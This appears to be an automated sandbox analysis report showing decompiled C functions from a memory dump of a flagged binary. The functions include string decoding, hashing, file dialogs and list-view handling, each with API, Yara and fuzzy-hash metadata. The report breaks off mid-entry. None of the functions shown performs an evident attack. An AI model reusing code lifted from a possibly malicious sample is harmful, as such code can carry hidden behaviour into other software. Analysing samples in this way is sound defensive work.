                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00410E8A(char* __eax, void* __edi) {
                                                                        				unsigned int _v5;
                                                                        				signed int _v6;
                                                                        				signed int _v7;
                                                                        				intOrPtr _v12;
                                                                        				intOrPtr _v16;
                                                                        				intOrPtr _t37;
                                                                        				char* _t56;
                                                                        				signed char _t57;
                                                                        				char* _t67;
                                                                        				void* _t68;
                                                                        				void* _t69;
                                                                        
                                                                        				_t68 = __edi;
                                                                        				_t56 = __eax;
                                                                        				_t69 = 0;
                                                                        				_t37 = strlen(__eax) + 0xfffffffd;
                                                                        				_v16 = _t37;
                                                                        				if(_t37 < 0) {
                                                                        					L18:
                                                                        					 *((char*)(_t69 + _t68)) = 0;
                                                                        					return _t69;
                                                                        				}
                                                                        				_v12 = 0xfffffffe;
                                                                        				_v12 = _v12 - _t56;
                                                                        				_t5 = _t56 + 2; // 0x411004
                                                                        				_t67 = _t5;
                                                                        				while(1) {
                                                                        					_t6 = _t67 - 2; // 0x75fff88b
                                                                        					_t39 =  *_t6;
                                                                        					if( *_t6 != 0x2e) {
                                                                        						_v6 = E00410E56(_t39);
                                                                        					} else {
                                                                        						_v6 = 0x3e;
                                                                        					}
                                                                        					_t9 = _t67 - 1; // 0xfc75fff8
                                                                        					_t41 =  *_t9;
                                                                        					if( *_t9 != 0x2e) {
                                                                        						_v5 = E00410E56(_t41);
                                                                        					} else {
                                                                        						_v5 = 0x3e;
                                                                        					}
                                                                        					_t43 =  *_t67;
                                                                        					if( *_t67 != 0x2e) {
                                                                        						_t57 = E00410E56(_t43);
                                                                        					} else {
                                                                        						_t57 = 0x3e;
                                                                        					}
                                                                        					_t45 =  *((intOrPtr*)(_t67 + 1));
                                                                        					if( *((intOrPtr*)(_t67 + 1)) != 0x2e) {
                                                                        						_v7 = E00410E56(_t45);
                                                                        					} else {
                                                                        						_v7 = 0x3e;
                                                                        					}
                                                                        					 *(_t68 + _t69) = _v5 >> 0x00000004 | _v6 << 0x00000002;
                                                                        					if( *_t67 == 0x2d) {
                                                                        						break;
                                                                        					}
                                                                        					 *(_t69 + _t68 + 1) = _t57 >> 0x00000002 | _v5 << 0x00000004;
                                                                        					if( *((char*)(_t67 + 1)) == 0x2d) {
                                                                        						 *((char*)(_t69 + _t68 + 2)) = 0;
                                                                        						_t34 = _t69 + 2; // 0x2
                                                                        						return _t34;
                                                                        					}
                                                                        					_t69 = _t69 + 3;
                                                                        					 *(_t69 + _t68 - 1) = _t57 << 0x00000006 | _v7;
                                                                        					_t25 = _t69 + 5; // 0x2
                                                                        					_t67 = _t67 + 4;
                                                                        					if(_t25 >= 0x3ff || _v12 + _t67 > _v16) {
                                                                        						goto L18;
                                                                        					} else {
                                                                        						continue;
                                                                        					}
                                                                        				}
                                                                        				 *(_t69 + _t68 + 1) = 0;
                                                                        				_t31 = _t69 + 1; // 0x1
                                                                        				return _t31;
                                                                        			}

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: strlen
                                                                        • String ID: >$>$>
                                                                        • API String ID: 39653677-3911187716
                                                                        • Opcode ID: cc9d2e4949e9ff96ebc93a83fa171427e13732e23a33d014681ceaf85bfc699f
                                                                        • Instruction ID: 69dee6f6c2e5f632f5f5b053a668a00b89048f502478ac4f4f3cd81ce8891ac8
                                                                        • Opcode Fuzzy Hash: cc9d2e4949e9ff96ebc93a83fa171427e13732e23a33d014681ceaf85bfc699f
                                                                        • Instruction Fuzzy Hash: D331D5318097C49ED7218B6980563EFFFA14F26304F188ADAD0E557343D2EC96CAC75A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 50%
                                                                        			E0040BC6D(signed int __eax, void* __ecx, void* _a4) {
                                                                        				unsigned int _t23;
                                                                        				signed int _t25;
                                                                        				unsigned int _t34;
                                                                        				unsigned int _t36;
                                                                        				void* _t40;
                                                                        				unsigned int _t45;
                                                                        				void* _t46;
                                                                        				int _t47;
                                                                        				void* _t48;
                                                                        				void* _t50;
                                                                        
                                                                        				_t48 = __ecx;
                                                                        				_t34 = __eax;
                                                                        				_t23 =  *(__ecx + 0x10);
                                                                        				_t36 = _t23 + __eax * 8;
                                                                        				 *(__ecx + 0x10) = _t36;
                                                                        				if(_t36 < _t23) {
                                                                        					 *((intOrPtr*)(__ecx + 0x14)) =  *((intOrPtr*)(__ecx + 0x14)) + 1;
                                                                        				}
                                                                        				 *((intOrPtr*)(_t48 + 0x14)) =  *((intOrPtr*)(_t48 + 0x14)) + (_t34 >> 0x1d);
                                                                        				_t25 = _t23 >> 0x00000003 & 0x0000003f;
                                                                        				if(_t25 == 0) {
                                                                        					L6:
                                                                        					if(_t34 >= 0x40) {
                                                                        						_t45 = _t34 >> 6;
                                                                        						do {
                                                                        							memcpy(_t48 + 0x18, _a4, 0x40);
                                                                        							_t50 = _t50 + 0xc;
                                                                        							E0040BD8A(_t48 + 0x18, _t48);
                                                                        							_a4 = _a4 + 0x40;
                                                                        							_t34 = _t34 - 0x40;
                                                                        							_t45 = _t45 - 1;
                                                                        						} while (_t45 != 0);
                                                                        					}
                                                                        					_push(_t34);
                                                                        					_push(_a4);
                                                                        					_push(_t48 + 0x18);
                                                                        				} else {
                                                                        					_t46 = 0x40;
                                                                        					_t47 = _t46 - _t25;
                                                                        					_t40 = _t48 + 0x18 + _t25;
                                                                        					if(_t34 >= _t47) {
                                                                        						memcpy(_t40, _a4, _t47);
                                                                        						_t50 = _t50 + 0xc;
                                                                        						E0040BD8A(_t48 + 0x18, _t48);
                                                                        						_a4 = _a4 + _t47;
                                                                        						_t34 = _t34 - _t47;
                                                                        						goto L6;
                                                                        					} else {
                                                                        						_push(_t34);
                                                                        						_push(_a4);
                                                                        						_push(_t40);
                                                                        					}
                                                                        				}
                                                                        				return memcpy();
                                                                        			}


                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memcpy
                                                                        • String ID: @
                                                                        • API String ID: 3510742995-2766056989
                                                                        • Opcode ID: 72109dd3c061e5e7965399845177051784b2c116136a58e32e92d3e3a8f21608
                                                                        • Instruction ID: cecad1072309209c94eeb2778a75b30bbc980c70aaade9bdc77468b7d13379ad
                                                                        • Opcode Fuzzy Hash: 72109dd3c061e5e7965399845177051784b2c116136a58e32e92d3e3a8f21608
                                                                        • Instruction Fuzzy Hash: 8B112BB29003056BDB288F16D8809AA77EAEF50344700063FFD0796291FB39DE55C6DC
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 80%
                                                                        			E0040A437(void* __esi) {
                                                                        				void* _v260;
                                                                        				char _v516;
                                                                        				void* __ebx;
                                                                        				char* _t16;
                                                                        				signed short _t25;
                                                                        				signed short _t27;
                                                                        				void* _t28;
                                                                        
                                                                        				_t28 = __esi;
                                                                        				_push(E00408647( *((intOrPtr*)(__esi + 0x370))));
                                                                        				_t25 = 4;
                                                                        				sprintf( &_v260, E004078FF(_t25));
                                                                        				_t16 = E00408BDE( *((intOrPtr*)(__esi + 0x370)), 0);
                                                                        				if(_t16 > 0) {
                                                                        					_push(_t16);
                                                                        					_t27 = 5;
                                                                        					sprintf( &_v516, E004078FF(_t27));
                                                                        					_t16 = strcat( &_v260,  &_v516);
                                                                        				}
                                                                        				if( *((intOrPtr*)(_t28 + 0x108)) != 0) {
                                                                        					return SendMessageA( *(_t28 + 0x114), 0x401, 0,  &_v260);
                                                                        				}
                                                                        				return _t16;
                                                                        			}


                                                                        APIs
                                                                          • Part of subcall function 004078FF: LoadStringA.USER32 ref: 004079C8
                                                                          • Part of subcall function 004078FF: memcpy.MSVCRT ref: 00407A07
                                                                        • sprintf.MSVCRT ref: 0040A45D
                                                                        • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040A4C0
                                                                          • Part of subcall function 004078FF: strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,73B74DE0), ref: 0040797A
                                                                          • Part of subcall function 004078FF: strlen.MSVCRT ref: 00407998
                                                                        • sprintf.MSVCRT ref: 0040A487
                                                                        • strcat.MSVCRT(?,?,?,00000000,00000000), ref: 0040A49A
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: sprintf$LoadMessageSendStringmemcpystrcatstrcpystrlen
                                                                        • String ID:
                                                                        • API String ID: 919693953-0
                                                                        • Opcode ID: 90207433884269e3a26f13c39c42963f5ff8dc1025de2d2684d4a636a9e51624
                                                                        • Instruction ID: 75288aada6eb4f7a447a9cf13bdf828529425e42ebb21a5188d22772f738aad9
                                                                        • Opcode Fuzzy Hash: 90207433884269e3a26f13c39c42963f5ff8dc1025de2d2684d4a636a9e51624
                                                                        • Instruction Fuzzy Hash: 2601DBB250030466D721B775DD86FEB73AC6F00304F40447BB74AF6082DABCE9808B29
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004098F4(intOrPtr* __ecx, intOrPtr _a4) {
                                                                        				void _v259;
                                                                        				char _v260;
                                                                        				void _v515;
                                                                        				char _v516;
                                                                        				void* __esi;
                                                                        				void* _t15;
                                                                        				intOrPtr* _t24;
                                                                        				char* _t26;
                                                                        
                                                                        				_t24 = __ecx;
                                                                        				_v260 = 0;
                                                                        				memset( &_v259, 0, 0xfe);
                                                                        				_v516 = 0;
                                                                        				memset( &_v515, 0, 0xfe);
                                                                        				_t15 =  *((intOrPtr*)( *_t24 + 0x20))();
                                                                        				_t26 =  &_v260;
                                                                        				E00409018(_t26, _t15);
                                                                        				sprintf( &_v516, "</%s>\r\n", _t26);
                                                                        				return E00405EFD(_a4,  &_v516);
                                                                        			}


                                                                        APIs
                                                                        • memset.MSVCRT ref: 00409917
                                                                        • memset.MSVCRT ref: 0040992D
                                                                          • Part of subcall function 00409018: strcpy.MSVCRT(00000000,?,00409701,?,?,?), ref: 0040901D
                                                                          • Part of subcall function 00409018: _strlwr.MSVCRT ref: 00409060
                                                                        • sprintf.MSVCRT ref: 00409957
                                                                          • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                          • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,73B74DE0,00000000,?,?,004092ED,00000001,00412B1C,73B74DE0), ref: 00405F17
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memset$FileWrite_strlwrsprintfstrcpystrlen
                                                                        • String ID: </%s>
                                                                        • API String ID: 3202206310-259020660
                                                                        • Opcode ID: 8cbe72e2fc2d9776a491eb44f024350a6eb65ee3e03a862d51b3af92fd5e6b23
                                                                        • Instruction ID: adbfc7571eef3522ba50f6b4148bdf50dea618c8f0168b60c77ad4ff43fabaf4
                                                                        • Opcode Fuzzy Hash: 8cbe72e2fc2d9776a491eb44f024350a6eb65ee3e03a862d51b3af92fd5e6b23
                                                                        • Instruction Fuzzy Hash: B201D1729001297AD720A719CC45FDA7AACAF84304F0400FAB60AF3182DA749F848BA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 89%
                                                                        			E00402221(void* __ecx, intOrPtr _a4, char* _a8) {
                                                                        				void* __ebx;
                                                                        				intOrPtr _t22;
                                                                        				void* _t23;
                                                                        				void* _t25;
                                                                        				void* _t27;
                                                                        				void* _t29;
                                                                        				void* _t32;
                                                                        				void* _t36;
                                                                        				signed short _t42;
                                                                        				char* _t47;
                                                                        				void* _t48;
                                                                        				intOrPtr _t49;
                                                                        				intOrPtr _t50;
                                                                        				void* _t57;
                                                                        
                                                                        				_t22 = _a4;
                                                                        				_t57 = _t22 - 6;
                                                                        				_t47 = _a8;
                                                                        				_t48 = __ecx;
                                                                        				 *_t47 = 0;
                                                                        				if(_t57 > 0) {
                                                                        					_t23 = _t22 - 7;
                                                                        					if(_t23 == 0) {
                                                                        						return __ecx + 0x214;
                                                                        					}
                                                                        					_t25 = _t23 - 1;
                                                                        					if(_t25 == 0) {
                                                                        						return __ecx + 0x294;
                                                                        					}
                                                                        					_t27 = _t25 - 1;
                                                                        					if(_t27 == 0) {
                                                                        						return __ecx + 0x314;
                                                                        					}
                                                                        					_t29 = _t27 - 1;
                                                                        					if(_t29 == 0) {
                                                                        						_t49 =  *((intOrPtr*)(__ecx + 0x3a0));
                                                                        						if(_t49 < 1 || _t49 > 7) {
                                                                        							if(_t49 < 8 || _t49 > 0xe) {
                                                                        								if(_t49 < 0xf || _t49 > 0x19) {
                                                                        									if(_t49 < 0x1a || _t49 > 0x2d) {
                                                                        										if(_t49 < 0x2e) {
                                                                        											L16:
                                                                        											return _t47;
                                                                        										}
                                                                        										_t42 = 0x519;
                                                                        									} else {
                                                                        										_t42 = 0x518;
                                                                        									}
                                                                        								} else {
                                                                        									_t42 = 0x517;
                                                                        								}
                                                                        							} else {
                                                                        								_t42 = 0x516;
                                                                        							}
                                                                        							goto L20;
                                                                        						} else {
                                                                        							_t42 = 0x515;
                                                                        							L20:
                                                                        							return E004078FF(_t42);
                                                                        						}
                                                                        					}
                                                                        					_t32 = _t29 - 1;
                                                                        					if(_t32 == 0) {
                                                                        						return __ecx + 0x190;
                                                                        					}
                                                                        					if(_t32 != 1) {
                                                                        						goto L16;
                                                                        					}
                                                                        					_t50 =  *((intOrPtr*)(__ecx + 0x39c));
                                                                        					L14:
                                                                        					if(_t50 != 0) {
                                                                        						_push(0xa);
                                                                        						_push(_t47);
                                                                        						_push(_t50);
                                                                        						L0041158E();
                                                                        					}
                                                                        					goto L16;
                                                                        				}
                                                                        				if(_t57 == 0) {
                                                                        					_t42 =  *((intOrPtr*)(__ecx + 0x210)) + 0x320;
                                                                        					goto L20;
                                                                        				}
                                                                        				if(_t22 == 0xfffffff6) {
                                                                        					_t36 = E004078FF( *((intOrPtr*)(__ecx + 0x8c)) + 0x384);
                                                                        					sprintf(_t47, "%s  %s  %s", E004078FF( *((intOrPtr*)(_t48 + 0x210)) + 0x320), _t48 + 0x110, _t36);
                                                                        					goto L16;
                                                                        				}
                                                                        				if(_t22 == 0) {
                                                                        					return __ecx + 0xc;
                                                                        				}
                                                                        				if(_t22 == 1) {
                                                                        					_t42 =  *((intOrPtr*)(__ecx + 0x8c)) + 0x384;
                                                                        					goto L20;
                                                                        				}
                                                                        				if(_t22 == 2) {
                                                                        					return __ecx + 0x90;
                                                                        				}
                                                                        				if(_t22 == 3) {
                                                                        					return __ecx + 0x110;
                                                                        				}
                                                                        				if(_t22 == 4) {
                                                                        					_t50 =  *((intOrPtr*)(__ecx + 0x394));
                                                                        					goto L14;
                                                                        				}
                                                                        				if(_t22 != 5) {
                                                                        					goto L16;
                                                                        				}
                                                                        				if( *((intOrPtr*)(__ecx + 0x398)) == 0) {
                                                                        					_push(0x10);
                                                                        				} else {
                                                                        					_push(0xf);
                                                                        				}
                                                                        				_pop(_t42);
                                                                        				goto L20;
                                                                        			}

                                                                        0x004022fa
                                                                        0x00000000
                                                                        0x004022ff
                                                                        0x0040224b
                                                                        0x00000000
                                                                        0x004022c1
                                                                        0x00402250
                                                                        0x004022b1
                                                                        0x00000000
                                                                        0x004022b1
                                                                        0x00402255
                                                                        0x00000000
                                                                        0x004022a0
                                                                        0x0040225a
                                                                        0x00000000
                                                                        0x00402295
                                                                        0x0040225f
                                                                        0x00402278
                                                                        0x00000000
                                                                        0x00402278
                                                                        0x00402264
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040226d
                                                                        0x00402274
                                                                        0x0040226f
                                                                        0x0040226f
                                                                        0x0040226f
                                                                        0x00402271
                                                                        0x00000000

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _ultoasprintf
                                                                        • String ID: %s %s %s
                                                                        • API String ID: 432394123-3850900253
                                                                        • Opcode ID: 7ea893eb970b9f9c330beb309c0cc5b8cf8f56ebc8930b7fcefd01bde23561b2
                                                                        • Instruction ID: d9c328b9b741649d7ae815da5d558f3ae5f994b92098e95e7c9169487fd3f945
                                                                        • Opcode Fuzzy Hash: 7ea893eb970b9f9c330beb309c0cc5b8cf8f56ebc8930b7fcefd01bde23561b2
                                                                        • Instruction Fuzzy Hash: C4410932504B15C7C636956487CCBEBA264A742304F6508BFEC5AF72D1C2FCAD41976B
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00406680(intOrPtr* __ebx, intOrPtr __ecx, char* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                        				intOrPtr _v20;
                                                                        				intOrPtr _v28;
                                                                        				intOrPtr _v32;
                                                                        				signed int _v36;
                                                                        				signed int _v44;
                                                                        				intOrPtr _v48;
                                                                        				char* _v52;
                                                                        				intOrPtr _v56;
                                                                        				signed int _v64;
                                                                        				intOrPtr _v68;
                                                                        				intOrPtr _v76;
                                                                        				struct tagOFNA _v80;
                                                                        				intOrPtr _t23;
                                                                        				intOrPtr* _t33;
                                                                        				intOrPtr _t34;
                                                                        				char* _t38;
                                                                        
                                                                        				_t38 = __edi;
                                                                        				_t34 = __ecx;
                                                                        				_t33 = __ebx;
                                                                        				_t23 = 1;
                                                                        				if(__ebx != 0) {
                                                                        					_t23 =  *__ebx;
                                                                        				}
                                                                        				_v64 = _v64 & 0x00000000;
                                                                        				_v44 = _v44 & 0x00000000;
                                                                        				_v36 = _v36 & 0x00000000;
                                                                        				_v56 = _t23;
                                                                        				_v32 = _a8;
                                                                        				_v20 = _a12;
                                                                        				_v76 = _t34;
                                                                        				_v80 = 0x4c;
                                                                        				_v68 = _a4;
                                                                        				_v52 = _t38;
                                                                        				_v48 = 0x104;
                                                                        				_v28 = 0x80806;
                                                                        				if(GetSaveFileNameA( &_v80) == 0) {
                                                                        					return 0;
                                                                        				} else {
                                                                        					if(_t33 != 0) {
                                                                        						 *_t33 = _v56;
                                                                        					}
                                                                        					strcpy(_t38, _v52);
                                                                        					return 1;
                                                                        				}
                                                                        			}




















                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileNameSavestrcpy
                                                                        • String ID: L
                                                                        • API String ID: 1182090483-2909332022
                                                                        • Opcode ID: 60ad435b05b414f2b30048372afc6468a300e5fb370a7e0e1bfb6bb36773f123
                                                                        • Instruction ID: a38c0b8f1c2b7ba0f1b8aa2faef71ae79cae630a3543d59e66951d479f2b4fd1
                                                                        • Opcode Fuzzy Hash: 60ad435b05b414f2b30048372afc6468a300e5fb370a7e0e1bfb6bb36773f123
                                                                        • Instruction Fuzzy Hash: 7F0125B1E102199FDF00CFA9D8807AEBBF8FF08319F10442AE915E6280DBB88915CF44
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040ADB3(void* __ebx, void* __eflags) {
                                                                        				char _v265;
                                                                        				char _v526;
                                                                        				char _v787;
                                                                        				void _v1048;
                                                                        				void _v3648;
                                                                        				intOrPtr _v3652;
                                                                        				char _v3660;
                                                                        				void* _t30;
                                                                        
                                                                        				_t30 = __ebx;
                                                                        				_v3660 = 0x41300c;
                                                                        				memset( &_v3648, 0, 0x10);
                                                                        				_v1048 = 0;
                                                                        				_v787 = 0;
                                                                        				_v526 = 0;
                                                                        				_v265 = 0;
                                                                        				_v3652 = 0x6c;
                                                                        				memcpy( &_v1048,  *((intOrPtr*)(__ebx + 0x370)) + 0xb20, 0x105 << 2);
                                                                        				if(E00401596( &_v3660,  *((intOrPtr*)(__ebx + 0x108))) != 0) {
                                                                        					E0040AD9D(memcpy( *((intOrPtr*)(__ebx + 0x370)) + 0xb20,  &_v1048, 0x105 << 2));
                                                                        				}
                                                                        				SetFocus( *( *((intOrPtr*)(_t30 + 0x370)) + 0x184));
                                                                        				return E0040143D( &_v3660);
                                                                        			}












                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040ADD3
                                                                        • SetFocus.USER32(?,?), ref: 0040AE5B
                                                                          • Part of subcall function 0040AD9D: PostMessageA.USER32 ref: 0040ADAC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FocusMessagePostmemset
                                                                        • String ID: l
                                                                        • API String ID: 3436799508-2517025534
                                                                        • Opcode ID: aeb443fdb5aee6ef7c028d3e89b28528cc274f3a7ebb19c8f17c9a74365f91d9
                                                                        • Instruction ID: a3aa1947760d1632b5ff20bf1b11b778d92a779fff19439862dc3abef3b95f30
                                                                        • Opcode Fuzzy Hash: aeb443fdb5aee6ef7c028d3e89b28528cc274f3a7ebb19c8f17c9a74365f91d9
                                                                        • Instruction Fuzzy Hash: 1011A1719002589BDF21AB14CC047CA7BAAAF80308F0804F5A94C7B292C7B55B88CFA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00408441(void** __esi, struct HWND__* _a4) {
                                                                        				long _v12;
                                                                        				signed int _v24;
                                                                        				signed int _v28;
                                                                        				short _v32;
                                                                        				void* _v40;
                                                                        				long _t17;
                                                                        				short* _t23;
                                                                        				int _t24;
                                                                        				void** _t25;
                                                                        
                                                                        				_t25 = __esi;
                                                                        				_t24 = 0;
                                                                        				if(_a4 != 0) {
                                                                        					_t17 = memset( *__esi, 0, __esi[1] << 2);
                                                                        					if(__esi[1] > 0) {
                                                                        						do {
                                                                        							_v28 = _v28 & 0x00000000;
                                                                        							_v24 = _v24 & 0x00000000;
                                                                        							_t23 =  *_t25 + _t24 * 4;
                                                                        							_v40 = 0x22;
                                                                        							_t17 = SendMessageA(_a4, 0x1019, _t24,  &_v40);
                                                                        							if(_t17 != 0) {
                                                                        								 *_t23 = _v32;
                                                                        								_t17 = _v12;
                                                                        								 *(_t23 + 2) = _t17;
                                                                        							}
                                                                        							_t24 = _t24 + 1;
                                                                        						} while (_t24 < _t25[1]);
                                                                        					}
                                                                        				}
                                                                        				return _t17;
                                                                        			}













                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040845A
                                                                        • SendMessageA.USER32(?,00001019,00000000,?), ref: 00408488
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessageSendmemset
                                                                        • String ID: "
                                                                        • API String ID: 568519121-123907689
                                                                        • Opcode ID: 34401dede8e385bb68c53d7b6caaa6400c7ccd3c24b43ec3f913943d5d854be5
                                                                        • Instruction ID: 3d4b9897b9e590d379032152458179bae83636b6f0047c21005e3f982915147a
                                                                        • Opcode Fuzzy Hash: 34401dede8e385bb68c53d7b6caaa6400c7ccd3c24b43ec3f913943d5d854be5
                                                                        • Instruction Fuzzy Hash: 4F01D635900205AFDB20CF95C941EAFB7F8FF84759F10842EE891AA240E738DA85CB75
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00406618(intOrPtr __eax, char* __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                        				intOrPtr _v20;
                                                                        				intOrPtr _v28;
                                                                        				intOrPtr _v32;
                                                                        				intOrPtr _v36;
                                                                        				intOrPtr _v44;
                                                                        				intOrPtr _v48;
                                                                        				char* _v52;
                                                                        				intOrPtr _v56;
                                                                        				intOrPtr _v64;
                                                                        				intOrPtr _v68;
                                                                        				intOrPtr _v76;
                                                                        				struct tagOFNA _v80;
                                                                        
                                                                        				_v76 = __eax;
                                                                        				_v68 = _a4;
                                                                        				_v64 = 0;
                                                                        				_v44 = 0;
                                                                        				_v36 = 0;
                                                                        				_v32 = _a8;
                                                                        				_v80 = 0x4c;
                                                                        				_v56 = 1;
                                                                        				_v52 = __esi;
                                                                        				_v48 = 0x104;
                                                                        				_v28 = 0x81804;
                                                                        				_v20 = 0x413008;
                                                                        				if(GetOpenFileNameA( &_v80) == 0) {
                                                                        					return 0;
                                                                        				} else {
                                                                        					strcpy(__esi, _v52);
                                                                        					return 1;
                                                                        				}
                                                                        			}
















                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileNameOpenstrcpy
                                                                        • String ID: L
                                                                        • API String ID: 812585365-2909332022
                                                                        • Opcode ID: 005d7a4cd57d0344050e2e978546a456973b8179e79084affb1262c5eec5662a
                                                                        • Instruction ID: 13dc2997c8553d865726dff807e233ea18e6c60b58d53e24b26ad6de5975139e
                                                                        • Opcode Fuzzy Hash: 005d7a4cd57d0344050e2e978546a456973b8179e79084affb1262c5eec5662a
                                                                        • Instruction Fuzzy Hash: 5201B2B1D10218AFCF40DFA9D8456CEBFF8BB08308F00812AE519E6240E7B886458F98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 88%
                                                                        			E004084CE(intOrPtr* __esi, void* __eflags) {
                                                                        				intOrPtr* _t22;
                                                                        				intOrPtr* _t31;
                                                                        
                                                                        				_t31 = __esi;
                                                                        				 *__esi = 0x413320;
                                                                        				_t22 = E00406549(0x1c8, __esi);
                                                                        				_push(0x14);
                                                                        				L004115D0();
                                                                        				if(_t22 == 0) {
                                                                        					_t22 = 0;
                                                                        				} else {
                                                                        					 *((intOrPtr*)(_t22 + 0xc)) = 0;
                                                                        					 *_t22 = 0;
                                                                        					 *((intOrPtr*)(_t22 + 4)) = 0;
                                                                        					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
                                                                        					 *((intOrPtr*)(_t22 + 8)) = 0;
                                                                        				}
                                                                        				_push(0x14);
                                                                        				 *((intOrPtr*)(_t31 + 4)) = _t22;
                                                                        				L004115D0();
                                                                        				if(_t22 == 0) {
                                                                        					_t22 = 0;
                                                                        				} else {
                                                                        					 *((intOrPtr*)(_t22 + 0xc)) = 0;
                                                                        					 *_t22 = 0;
                                                                        					 *((intOrPtr*)(_t22 + 4)) = 0;
                                                                        					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
                                                                        					 *((intOrPtr*)(_t22 + 8)) = 0;
                                                                        				}
                                                                        				_push(0x14);
                                                                        				 *((intOrPtr*)(_t31 + 8)) = _t22;
                                                                        				L004115D0();
                                                                        				if(_t22 == 0) {
                                                                        					_t22 = 0;
                                                                        				} else {
                                                                        					 *((intOrPtr*)(_t22 + 0xc)) = 0;
                                                                        					 *_t22 = 0;
                                                                        					 *((intOrPtr*)(_t22 + 4)) = 0;
                                                                        					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
                                                                        					 *((intOrPtr*)(_t22 + 8)) = 0;
                                                                        				}
                                                                        				_push(0x14);
                                                                        				 *((intOrPtr*)(_t31 + 0xc)) = _t22;
                                                                        				L004115D0();
                                                                        				if(_t22 == 0) {
                                                                        					_t22 = 0;
                                                                        				} else {
                                                                        					 *((intOrPtr*)(_t22 + 0xc)) = 0;
                                                                        					 *_t22 = 0;
                                                                        					 *((intOrPtr*)(_t22 + 4)) = 0;
                                                                        					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
                                                                        					 *((intOrPtr*)(_t22 + 8)) = 0;
                                                                        				}
                                                                        				 *((intOrPtr*)(_t31 + 0x10)) = _t22;
                                                                        				return _t31;
                                                                        			}

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ??2@$memset
                                                                        • String ID:
                                                                        • API String ID: 1860491036-0
                                                                        • Opcode ID: 95721ad3e56739601f71688443cad15957724b47e5dc3dc32a69c890d8a4f10a
                                                                        • Instruction ID: 33d46294e57da76ea2c08804649fae6184d1477937e8cd9eb119e1572679ad16
